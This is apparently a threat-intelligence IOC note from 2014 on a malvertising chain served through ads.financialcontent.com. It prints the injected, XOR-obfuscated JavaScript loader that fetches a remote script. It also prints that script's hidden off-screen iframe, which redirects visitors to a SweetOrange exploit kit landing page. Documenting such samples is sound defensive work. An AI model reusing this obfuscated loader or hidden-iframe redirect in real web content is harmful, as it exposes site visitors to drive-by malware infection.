IOC - ads.financialcontent.com - 2014-10-15

1. // Example of a malvertising page at ads.financialcontent.com - ads.financialcontent.com/www/delivery/afr.php?n=fcad7468269&&zoneid=2947&cb=fcad7468269
2.  
3. // The following 'bonus' JS is injected into returned page
4.  
5. <script>
6.     var w = 0x00;
7.     var fUBpk = "1bffdfdf781a09d923064b69ccd35fc4e356e913b0b104ffc62ab8d444c329b62644cafc73a03adc7bf5ca3c016aac2356db";
8.     var teKK = "738babaf423526b04d65390ca1b631b0823ac761dfc565d1a15fcaa16ba65dde4f27ab905cd05fa85497b3136c03c20d3ca8";
9.     var JoIRJ = "";
10.     for (var i = 0; i < (fUBpk.length / 2); i++) {
11.         JoIRJ += String.fromCharCode(parseInt((fUBpk[w] + fUBpk[w + 1]), 16) ^ parseInt((teKK[w] + teKK[w + 1]), 16));
12.         w += 2;
13.     }
14.     var celebrate = document.getElementsByTagName("he" + "ad").item(0);
15.     var peabody = document.createElement("sc" + "ri" + "pt");
16.     peabody.setAttribute("t" + "ype", "te" + "xt/java" + "scr" + "ipt");
17.     peabody.setAttribute("a" + "sync", "t" + "rue");
18.     peabody.setAttribute("s" + "rc", JoIRJ);
19.     if (document.cookie.indexOf("hardtline") == -1) {
20.         document.cookie = "hardtline=job; path=/; expires=Sun, 19 Oct 14 03:00:18 +0400;";
21.         celebrate.appendChild(peabody);
22.     }
23. </script>
24.  
25. // This will produce and request the following URL - http://incremental.rota.guru/ethical/pet/by/min.js
26.  
27. // The content of 'min.js' is quite simple. All it does is redirecting to SweetOrange EK landing page.
28.  
29. var simplicity = document.createElement("iframe");
30. simplicity.setAttribute("src", "http://feature.eduardadior.com:15106/reply/pm/spacer.php?files=322");
31. simplicity.style.position = "abs" + "olute";
32. simplicity.style.left = "-9871px";
33. simplicity.style.top = "-4466px";
34. simplicity.style.width = "147";
35. simplicity.style.height = "144";
36. document.body.appendChild(simplicity);